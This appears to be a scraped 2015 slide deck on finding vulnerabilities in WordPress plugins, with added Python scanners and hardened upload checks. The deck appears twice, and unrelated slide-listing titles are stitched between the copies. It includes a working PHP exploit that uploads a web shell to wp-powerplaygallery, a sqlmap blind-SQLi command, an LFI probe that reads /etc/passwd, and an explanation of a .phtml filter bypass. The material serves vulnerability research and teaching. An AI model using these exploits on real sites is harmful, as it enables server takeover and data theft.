Hacking WordPress Plugins
Larry W. Cashdollar
8/1/2015
v1.2
What is WordPress
• Content Management System (CMS)
• 23% of all websites (3/23/15)
• Plugins - add functionality
• Plugins may be authored by anyone
Why hack WordPress plugins?
• #1 CMS by number and percentage
• Poor security model
• Lack of QA on 3rd party plugins
• More fun than Ruby Gems
Methodology
• Large code footprint with plugins and themes
• Prefer no authentication required to exploit*
• Look for PHP code that might be exploitable
• Search specific traits or patterns:
– upload.php
– download.php
– proxy.php
Requirements
• Processes user input
• Has reachable code, not just defining a class
• Doesn’t check if accessed directly
• Doesn’t require authentication
• Doesn’t require WP API hooks*
Vulnerabilities
• LFI
• RFI
• RCE
• Open Proxies
• SQL Injection
• XSS
Plugin Code Criteria
• No $_POST / $_GET / $_FILES / $_REQUEST access: punt
• if (!defined('ABSPATH')) die; present: punt
• if (!is_admin()) die; present: punt
• File only defines a class or function (nothing runs on direct access): punt
• May have injectable SELECT, INSERT, DELETE, UPDATE, etc.
A Quick Look
• Download a few random plugins
• Examine files named upload.php or
download.php
• Found RFI (in practice an unrestricted file upload, CWE-434) in videowhisper-video-presentation
• The code:
<?php

if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;

if (strstr($filename,'.php')) exit;

//do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;

$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";

$ext=strtolower(substr($filename,-4));

$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps ");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1
Exploiting it
• Upload .phtml or .shtml: strstr($filename,'.php') doesn't match either name, and substr($filename,-4) of both is "html", which is on the allow list
• Code runs as the web server user (www-data)
• Previously patched (I circumvented the patch)*
• Also present in videowhisper-video-conference-integration
* Annoying but still fun
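To make the bypass concrete, here is the plugin's filename check ported from the PHP above to Python, next to a hardened version. This is an added example, not code from videowhisper or from the deck; the candidate filenames are constructed for the demo, and the slide's allow list shows a stray space in ".pps ", which is dropped here. Whether an uploaded .phtml or .shtml actually executes depends on the server: Debian/Ubuntu's stock Apache PHP module config handles .phtml as PHP, and .shtml only goes through mod_include when SSI is enabled.

```python
"""The videowhisper extension check, ported to Python, beside a hardened check.
Added example (not plugin code): only the filename logic is modelled."""
import os
from typing import List

# The plugin's allow list as shown on the slide; the dotless "jpeg", "docx", "html"
# entries exist because the check compares only the last four characters.
ALLOWED_LAST4 = [".swf", ".zip", ".rar", ".jpg", "jpeg", ".png", ".gif", ".txt", ".doc", "docx",
                 ".htm", "html", ".pdf", ".mp3", ".flv", ".avi", ".mpg", ".ppt", ".pps"]


def vulnerable_accepts(filename: str) -> bool:
    """Mirrors the plugin: strstr($filename,'.php'), no '/' or '..', then substr(-4) in list."""
    if ".php" in filename:                  # strstr is case-sensitive and needs the literal ".php"
        return False
    if "/" in filename or ".." in filename:
        return False
    ext = filename[-4:].lower()             # strtolower(substr($filename, -4))
    return ext in ALLOWED_LAST4             # "shell.phtml"[-4:] == "html": accepted


# Extensions the web server (or the PHP module's config) may execute or interpret.
SERVER_EXEC = {"php", "php3", "php4", "php5", "php7", "phtml", "phps", "phar",
               "shtml", "shtm", "stm", "cgi", "pl", "htaccess"}
# Whole extensions we are willing to store; htm/html dropped because they give stored XSS.
SAFE_EXT = {"swf", "zip", "rar", "jpg", "jpeg", "png", "gif", "txt", "doc", "docx",
            "pdf", "mp3", "flv", "avi", "mpg", "ppt", "pps"}


def hardened_accepts(filename: str) -> bool:
    """Whole-extension allow list, every dotted segment checked, no path separators."""
    if not filename or "\\" in filename or os.path.basename(filename) != filename:
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:      # no extension, or a dotfile such as .htaccess
        return False
    if any(p in SERVER_EXEC for p in parts[1:]):  # rejects shell.phtml and shell.php.jpg alike
        return False
    return parts[-1] in SAFE_EXT


# Constructed candidate names for the demo.
CANDIDATES = ["deck.ppt", "photo.jpeg", "shell.php", "shell.PHP", "shell.phtml",
              "shell.shtml", "shell.php.jpg", "../shell.html"]


def slipped_through() -> List[str]:
    """Names the plugin's check accepts but the hardened check rejects."""
    return [n for n in CANDIDATES if vulnerable_accepts(n) and not hardened_accepts(n)]


if __name__ == "__main__":
    for n in CANDIDATES:
        print(f"{n:16} plugin={vulnerable_accepts(n)!s:5} hardened={hardened_accepts(n)}")
    print("bypasses:", slipped_through())
```

The hardened check also renames nothing; in a real plugin you would additionally store the file under a server-generated name and outside any directory the web server executes scripts from.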
Initial Progress
• Downloaded 10 random plugins
• Found RFI in two of them!
• Plugins had ~ 5k downloads
• Must be more vulnerabilities out there
Automate?
• Download lots of plugins
• grep code for specific patterns?
• Same idea as Ruby Gem research I did
• Easy to test with PoC
• More fun!
• Maybe write code to flag high risk code?
Code Ferret v1.0 Feature Doc
• Supply list of .php files to examine
• Check for user input
• Ignore if author checks for ABSPATH etc..
• Look for SQL functions
• Flag if use of WP API
• Flag if include files
Code Ferret v1.0 Design Doc
• Look for specific functions and strings
• Anything of interest added to link list
• Link list stores line number and reason for flag
• Dump output & statistics
• ANSI COLOR!
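As an added example (my code, not Larry's Code Ferret, whose source the deck does not show), here is a small Python triage scanner that applies the punt rules from the Plugin Code Criteria slide and the Code Ferret v1.0 feature list. The regexes, the brace-depth heuristic for "is this code reachable without a caller", and the three sample PHP snippets are mine. It is a filter for where to spend manual review time, not a vulnerability detector.

```python
"""Triage scanner for WordPress plugin .php files (added example, not Code Ferret).

Applies the punt rules from the Plugin Code Criteria slide and the Code Ferret
v1.0 feature list. Regexes, the reachability heuristic and the sample snippets
at the bottom are mine and constructed for this demo.
"""
import re
import sys
from dataclasses import dataclass, field
from typing import Iterator, List, Optional, Tuple

USER_INPUT = re.compile(r"\$_(GET|POST|FILES|REQUEST|COOKIE)\b")
# Any of these means the author gated direct access: punt.
ACCESS_GUARD = re.compile(r"""defined\s*\(\s*['"]ABSPATH['"]\s*\)|\bis_admin\s*\(|\bcurrent_user_can\s*\(|\bcheck_ajax_referer\s*\(""")
SQL_SINK = re.compile(r"\$wpdb->(query|get_results|get_var|get_row|get_col)\s*\(|\bmysqli?_query\s*\(", re.I)
SQL_CONCAT = re.compile(r"""["'][^"']*\b(SELECT|INSERT|UPDATE|DELETE)\b[^"']*["']\s*\.""", re.I)
WP_API = re.compile(r"\b(get_option|wp_upload_dir|add_action|add_filter|wp_verify_nonce|trailingslashit)\s*\(")
INCLUDE = re.compile(r"\b(require|include)(_once)?\b")
# A line opening a class/function/interface/trait body, with optional modifiers.
SCOPE_OPEN = re.compile(r"^\s*(?:(?:abstract|final|public|protected|private|static)\s+)*(?:class|function|interface|trait)\b")


@dataclass
class Finding:
    line: int
    reason: str


@dataclass
class Report:
    path: str
    punt: Optional[str] = None          # set when the file is not worth manual review
    findings: List[Finding] = field(default_factory=list)


def strip_comments(src: str) -> str:
    """Drop /* */ and line comments (heuristic) while keeping line numbers stable."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), src, flags=re.S)
    return re.sub(r"(^|[ \t])(//|#)[^\n]*", r"\1", src, flags=re.M)


def reachable_lines(src: str) -> Iterator[Tuple[int, str, bool]]:
    """Yield (lineno, line, reachable); reachable is False inside a class/function body,
    i.e. code that only runs if something calls it (the 'only defines a class' punt rule)."""
    stack: List[bool] = []              # one entry per open brace: True if it began a definition
    pending_def = False
    for n, line in enumerate(src.splitlines(), 1):
        if SCOPE_OPEN.match(line):
            pending_def = True
        yield n, line, not any(stack)
        for ch in line:
            if ch == "{":
                stack.append(pending_def)
                pending_def = False
            elif ch == "}" and stack:
                stack.pop()


def scan_source(path: str, src: str) -> Report:
    rep = Report(path)
    src = strip_comments(src)
    if not USER_INPUT.search(src):
        rep.punt = "no superglobal input"
        return rep
    if ACCESS_GUARD.search(src):
        rep.punt = "ABSPATH / is_admin / capability guard present"
        return rep
    reachable_input = False
    for n, line, reachable in reachable_lines(src):
        if USER_INPUT.search(line):
            reachable_input = reachable_input or reachable
            rep.findings.append(Finding(n, "user input at file scope" if reachable
                                        else "user input inside class/function (needs a caller)"))
        if SQL_SINK.search(line) or SQL_CONCAT.search(line):
            rep.findings.append(Finding(n, "SQL built or executed here; check for injection"))
        if WP_API.search(line):
            rep.findings.append(Finding(n, "WordPress API call; fatals on direct access unless WP is loaded"))
        if INCLUDE.search(line):
            rep.findings.append(Finding(n, "include/require; check for user-controlled path"))
    if not reachable_input:
        rep.punt = "only defines a class/function; no directly reachable code"
    return rep


# Constructed samples modelled on the slides, not the real plugin files.
SAMPLE_UPLOAD = """<?php
if ($_GET["room"]) $room = $_GET["room"];
$filename = $_FILES['vw_file']['name'];
include_once("incsan.php");
move_uploaded_file($_FILES['vw_file']['tmp_name'], "uploads/" . $room . "/" . $filename);
"""
SAMPLE_GUARDED = """<?php
if (!defined('ABSPATH')) die;
$id = intval($_GET['id']);
"""
SAMPLE_CLASS = """<?php
class Gallery_Ajax {
    public function upload() {
        $wpdb->query("INSERT INTO " . $wpdb->prefix . "pp_images VALUES (" . $_REQUEST['albumid'] . ")");
    }
}
"""
SAMPLES = [("upload.php", SAMPLE_UPLOAD), ("guarded.php", SAMPLE_GUARDED), ("class.php", SAMPLE_CLASS)]

if __name__ == "__main__":
    targets = [(p, open(p, encoding="utf-8", errors="replace").read()) for p in sys.argv[1:]] or SAMPLES
    for path, src in targets:
        rep = scan_source(path, src)
        print(f"{rep.path}: " + (f"PUNT ({rep.punt})" if rep.punt else "REVIEW"))
        for f in rep.findings:
            print(f"  line {f.line}: {f.reason}")
```

Run it with a list of .php files (for instance the output of find over a plugin checkout restricted to upload.php and download.php), or with no arguments to scan the three constructed samples. Expect false negatives: the guard regex only sees the patterns listed, and an ABSPATH check living in an included file is invisible to it.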
Semi Automatic
• svn checkout https://plugins.svn.wordpress.org/ (the plugin directory is Subversion; use svn or git svn, not a plain git pull)
• Scraped Plugins off wordpress.org
• Downloaded 36,000 plugins
• About 20 GB of data
• upload.php or download.php
• Use Ferret v1.0 to quickly examine lots of files
• Profit! Err get some CVEs
Ferret output
Ferret First Run
• wp-powerplaygallery v3.3
• Flagged for user input with no access controls
• Accesses WordPress API calls
• Loads WordPress functions via require_once()
• Code examination turns up RFI and Blind SQLi!
wp-powerplaygallery RFI Code
if (!empty($_FILES)) {
    if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}');
    }

    // Read binary input stream and append it to temp file
    if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    }
    // ... (several lines not shown on the slide)
    while ($buff = fread($in, 4096)) {
        fwrite($out, $buff);
    }
wp-powerplaygallery SQLI code
$query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` )
          VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
$wpdb->query($query);
RFI Exploit Requirements
• POST request
• Variable albumid must point at existing album
in database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains payload with local full
path
• name variable contains our filename
PoC Exploit
<?php
/* Remote shell upload exploit for wp-powerplaygallery v3.3 */
/* Larry W. Cashdollar @_larry0
   6/27/2015
   albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
   but you can enumerate these by using curl, and looking for redirect 301 responses:
   e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
   -> 301 exists else 404 doesn't.
   shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
*/

$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
// The '@/path' upload syntax is the pre-5.6 default; on PHP 5.5+ use
// new CURLFile($file_name_with_full_path) instead (the '@' form is gone in PHP 7).
$post = array('albumid' => '1', 'name' => 'shell.php', 'file' => '@' . $file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
Blind SQLi Exploit
• Sqlmap
$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql --level 5 --risk 3
Lazy Exploits
• Started using php-cgi to test exploits
• The script Poc.sh
#!/bin/sh
# Fake the CGI environment so php-cgi runs the plugin file directly, no web server needed.
export GATEWAY_INTERFACE=CGI/1.1
export PATH_TRANSLATED=UserSettings.php
export QUERY_STRING=network=../../../../../../../../etc/passwd
export REDIRECT_STATUS=CGI   # required by cgi.force_redirect; any value satisfies it
export REQUEST_METHOD=GET
php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php
$ ./Poc.sh
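Poc.sh only covers GET. Handlers such as upload.php read $_POST and $_FILES, so php-cgi needs a request body on stdin plus CONTENT_TYPE and CONTENT_LENGTH. The following Python wrapper is an added example, not the deck's script: it assumes php-cgi is on PATH, the plugin paths under __main__ are placeholders for your own checkout, and the multipart encoding is built by hand so $_FILES is populated the way a browser upload would populate it.

```python
"""php-cgi harness generalising Poc.sh to POST and multipart uploads.

Added example, not the deck's script. Assumes php-cgi is on PATH; the plugin
paths under __main__ are placeholders. Runs from the script's own directory so
relative include_once() and 'uploads/' paths resolve as they would under Apache.
"""
import os
import subprocess
import uuid
from typing import Dict, Optional, Tuple


def build_cgi_env(script: str, method: str = "GET", query: str = "",
                  body: bytes = b"", content_type: str = "") -> Dict[str, str]:
    """CGI/1.1 variables php-cgi needs. REDIRECT_STATUS satisfies cgi.force_redirect,
    which otherwise makes php-cgi refuse to run outside a web server."""
    path = os.path.abspath(script)
    env = {
        "GATEWAY_INTERFACE": "CGI/1.1",
        "REDIRECT_STATUS": "CGI",
        "REQUEST_METHOD": method,
        "SCRIPT_FILENAME": path,
        "PATH_TRANSLATED": path,
        "QUERY_STRING": query,
        "REMOTE_ADDR": "127.0.0.1",
    }
    if method == "POST":
        env["CONTENT_TYPE"] = content_type
        env["CONTENT_LENGTH"] = str(len(body))   # php-cgi reads exactly this many bytes from stdin
    return env


def multipart_body(fields: Dict[str, str],
                   files: Dict[str, Tuple[str, bytes]]) -> Tuple[bytes, str]:
    """Hand-built multipart/form-data; returns (body, Content-Type header value)."""
    boundary = "----poc" + uuid.uuid4().hex
    chunks = []
    for name, value in fields.items():
        chunks.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
                      f"\r\n\r\n{value}\r\n".encode())
    for name, (fname, data) in files.items():
        head = (f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"; filename="{fname}"\r\n'
                "Content-Type: application/octet-stream\r\n\r\n").encode()
        chunks.append(head + data + b"\r\n")
    chunks.append(f"--{boundary}--\r\n".encode())
    return b"".join(chunks), f"multipart/form-data; boundary={boundary}"


def run_php_cgi(script: str, method: str = "GET", query: str = "",
                fields: Optional[Dict[str, str]] = None,
                files: Optional[Dict[str, Tuple[str, bytes]]] = None,
                php_cgi: str = "php-cgi") -> Tuple[str, str]:
    """Run one request against a plugin file; returns (stdout, stderr)."""
    body, ctype = b"", ""
    if method == "POST":
        body, ctype = multipart_body(fields or {}, files or {})
    env = dict(os.environ, **build_cgi_env(script, method, query, body, ctype))
    script_abs = os.path.abspath(script)
    proc = subprocess.run([php_cgi, script_abs], input=body, env=env,
                          capture_output=True, cwd=os.path.dirname(script_abs))
    return proc.stdout.decode(errors="replace"), proc.stderr.decode(errors="replace")


if __name__ == "__main__":
    # GET: the LFI probe from Poc.sh (path is a placeholder for your checkout)
    out, err = run_php_cgi("./plugin/buddystream/extensions/default/templates/UserSettings.php",
                           query="network=../../../../../../../../etc/passwd")
    print(out or err)
    # POST: an upload in the shape wp-powerplaygallery's upload.php expects
    # (albumid must match an existing album; payload here is benign)
    out, err = run_php_cgi("./plugin/wp-powerplaygallery/upload.php", method="POST",
                           fields={"albumid": "1", "name": "shell.php"},
                           files={"file": ("shell.php", b"<?php echo 'hi'; ?>")})
    print(out or err)
```

This gets you past the CGI plumbing, not past the Pitfalls slide: a file that calls get_option() or trailingslashit() without bootstrapping WordPress still fatals here exactly as in the Apache logs that follow.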
Pitfalls of Exploitation
• Exploitable code is a class and isn’t reachable*
• Code uses WordPress functions or functions
from other segments of code with no includes
• Code is incomplete or just broken
• Someone discovered it last year
Fatal Errors
[Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27
[Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90
[Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
[Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
[Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
Vulnerable and Broken
<?php
$uploaddir = 'uploads/';   // this needs to be a full path; relative to the CWD the move fails
$file = $uploaddir . basename($_FILES['uploadfile']['name']);
if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)) {
    echo "success";
} else {
    echo "error";
}
?>
Oddities
• Return local IP address of server
• Prints the FULL path of the webserver server
• Plugin that downloads itself ?!
Statistics
• 20 CVEs
• 26* Vulnerabilities found
• 6 were previously discovered and not included*
• All in all 32 Vulnerabilities discovered
• Dozens of known exploitable vulnerabilities
remain unpatched
* I now google ‘<pluginname> vulnerability’ before
bothering to document
Improvements
• Parse php scripts checking for reachable code
• Use RIPS v1.0 (thanks Chad!)
• Circle back and examine vulnerabilities that
require login to WP for exploitation
Questions?
• larry@akamai.com
• Twitter @_larry0
Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 75+ CVEs
• Formerly Unix Systems Administrator 17 years
• Penetration Tester Back in Late 90s
• Enjoy Writing and Breaking Code

 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their Engineering
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion Application
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. Salesforce
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and Repair
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 

Hacking Wordpress Plugins

1. Hacking WordPress Plugins
Larry W. Cashdollar
8/1/2015
v1.2

2. What is WordPress
• Content Management System (CMS)
• 23% of all websites (3/23/15)
• Plugins - add functionality
• Plugins may be authored by anyone

3. Why hack WordPress plugins?
• #1 CMS by number and percentage
• Poor security model
• Lack of QA on 3rd party plugins
• More fun than Ruby Gems

4. Methodology
• Large code footprint with plugins and themes
• Prefer no authentication required to exploit*
• Look for PHP code that might be exploitable
• Search specific traits or patterns:
  – upload.php
  – download.php
  – proxy.php

5. Requirements
• Processes user input
• Has reachable code, not just defining a class
• Doesn’t check if accessed directly
• Doesn’t require authentication
• Doesn’t require WP API hooks*

6. Vulnerabilities
• LFI
• RFI
• RCE
• Open Proxies
• SQL Injection
• XSS

7. Plugin Code Criteria
• Doesn’t have POST/GET/FILE/REQUEST → PUNT
• if (!defined(ABSPATH)) die; → PUNT
• if (!is_admin) die; → PUNT
• function class() {}; → PUNT
• May have injectable SELECT, INSERT, DELETE, UPDATE, etc.

8. A Quick Look
• Download a few random plugins
• Examine files named upload.php or download.php
• Found RFI in videowhisper-video-presentation
• The code:

9. The videowhisper-video-presentation upload code
<?php

if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];

include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;

if (strstr($filename,'.php')) exit;

//do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;

$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";

$ext=strtolower(substr($filename,-4));
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps ");

if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1

10. Exploiting it
• Upload .phtml .shtml
• Execute as www-data user
• Previously patched (I circumvented)*
• Also present in videowhisper-video-conference-integration
* Annoying but still fun
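The last-four-characters check on slide 9 is why the .phtml and .shtml uploads on slide 10 get through: both end in "html", which is in the allowlist. This added Python model (not the plugin's PHP) reproduces that check beside a whole-extension allowlist so the difference can be tested; the SAFE_EXTENSIONS set and the sample filenames are constructed here.

```python
"""Model of the slide-9 extension check (constructed example, not the plugin's
own PHP): strtolower(substr($filename,-4)) looks only at the final four
characters, so 'talk.phtml' and 'talk.shtml' both end in 'html' and pass."""

# Allowlist as on the slide; the dot-less entries ("jpeg", "docx", "html")
# exist only because the comparison is against the last four characters.
PLUGIN_ALLOWED = {".swf", ".zip", ".rar", ".jpg", "jpeg", ".png", ".gif", ".txt",
                  ".doc", "docx", ".htm", "html", ".pdf", ".mp3", ".flv", ".avi",
                  ".mpg", ".ppt", ".pps"}

# Hardened list (constructed): whole extensions, compared as one token.
SAFE_EXTENSIONS = {"swf", "zip", "rar", "jpg", "jpeg", "png", "gif", "txt", "doc",
                   "docx", "htm", "html", "pdf", "mp3", "flv", "avi", "mpg", "ppt", "pps"}

def plugin_check(filename: str) -> bool:
    """The plugin's logic: reject anything containing '.php', then require the
    lowercased last four characters to be in the allowlist."""
    if ".php" in filename:                          # strstr($filename,'.php')
        return False
    return filename[-4:].lower() in PLUGIN_ALLOWED  # strtolower(substr(...,-4))

def hardened_check(filename: str) -> bool:
    """Whole-extension allowlist: everything after the final dot is compared as
    a unit, so 'phtml' and 'shtml' are simply not listed. Path separators and
    '..' are rejected as the slide's code already does."""
    if not filename or "/" in filename or "\\" in filename or ".." in filename:
        return False
    base, dot, ext = filename.rpartition(".")
    if not dot or not base or not ext.isalnum():
        return False
    return ext.lower() in SAFE_EXTENSIONS

if __name__ == "__main__":
    for name in ("slides.pdf", "photo.jpeg", "talk.phtml", "talk.shtml", "talk.php"):
        print(f"{name:12} plugin={plugin_check(name)!s:5} hardened={hardened_check(name)}")
```

Even with a correct allowlist, the uploads directory should have script execution disabled at the web server, since the fix above still admits .htm/.html files.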
11. Initial Progress
• Downloaded 10 random plugins
• Found RFI in two of them!
• Plugins had ~5k downloads
• Must be more vulnerabilities out there

12. Automate?
• Download lots of plugins
• grep code for specific patterns?
• Same idea as Ruby Gem research I did
• Easy to test with PoC
• More fun!
• Maybe write code to flag high risk code?

13. Code Ferret v1.0 Feature Doc
• Supply list of .php files to examine
• Check for user input
• Ignore if author checks for ABSPATH etc.
• Look for SQL functions
• Flag if use of WP API
• Flag if include files

14. Code Ferret v1.0 Design Doc
• Look for specific functions and strings
• Anything of interest added to link list
• Link list stores line number and reason for flag
• Dump output & statistics
• ANSI COLOR!
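A minimal Python version of what slides 13 and 14 describe, added here and not the author's Code Ferret: per line it flags user input, SQL, WP API calls, includes and upload calls, stores line number and reason, punts files that guard against direct access (slide 7) or take no user input, and dumps statistics. The regexes and the two PHP fragments are constructed for this example.

```python
"""Minimal static triage in the spirit of the slides' Code Ferret (added example,
not the author's tool): flag per line, punt guarded or input-free files."""
import re

RULES = [  # (reason, pattern) applied to every source line
    ("user input",  re.compile(r"\$_(GET|POST|FILES|REQUEST|COOKIE)\b")),
    ("SQL",         re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE)\b.*\b(FROM|INTO|SET)\b|\$wpdb->query", re.I)),
    ("WP API",      re.compile(r"\$wpdb->|\b(get_option|add_action|wp_[a-z_]+)\s*\(")),
    ("include",     re.compile(r"\b(include|require)(_once)?\b")),
    ("file upload", re.compile(r"\bmove_uploaded_file\s*\(")),
]
PUNTS = [  # a hit on any line means the file is not reachable directly: skip it
    ("ABSPATH guard", re.compile(r"defined\s*\(\s*['\"]?ABSPATH['\"]?\s*\)")),
    ("is_admin guard", re.compile(r"\bis_admin\s*\(")),
]

def ferret(source):
    """Return {'punt': reason or None, 'flags': [(line_no, reason), ...]}."""
    flags = []
    for no, line in enumerate(source.splitlines(), 1):
        for reason, pat in PUNTS:
            if pat.search(line):
                return {"punt": reason, "flags": []}
        flags += [(no, reason) for reason, pat in RULES if pat.search(line)]
    if not any(reason == "user input" for _, reason in flags):
        return {"punt": "no user input", "flags": []}   # slide 7: no POST/GET/FILE/REQUEST
    return {"punt": None, "flags": flags}

def summarize(results):
    """Dump-style statistics over many ferret() results: counts per reason."""
    stats = {"flagged": 0, "punted": 0, "reasons": {}}
    for r in results:
        kind = "punted" if r["punt"] else "flagged"
        stats[kind] += 1
        for reason in ([r["punt"]] if r["punt"] else [f for _, f in r["flags"]]):
            stats["reasons"][reason] = stats["reasons"].get(reason, 0) + 1
    return stats

# Constructed PHP fragments modelled on slides 7 and 9 (not the plugins' files).
SAMPLE_UPLOAD = """<?php
if ($_GET["room"]) $room=$_GET["room"];
$filename=$_FILES['vw_file']['name'];
include_once("incsan.php");
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $dest.$filename);
?>"""
SAMPLE_GUARDED = "<?php\nif (!defined('ABSPATH')) die;\n$room = $_GET['room'];\n?>"

if __name__ == "__main__":
    for name, src in (("upload.php", SAMPLE_UPLOAD), ("guarded.php", SAMPLE_GUARDED)):
        print(name, ferret(src))
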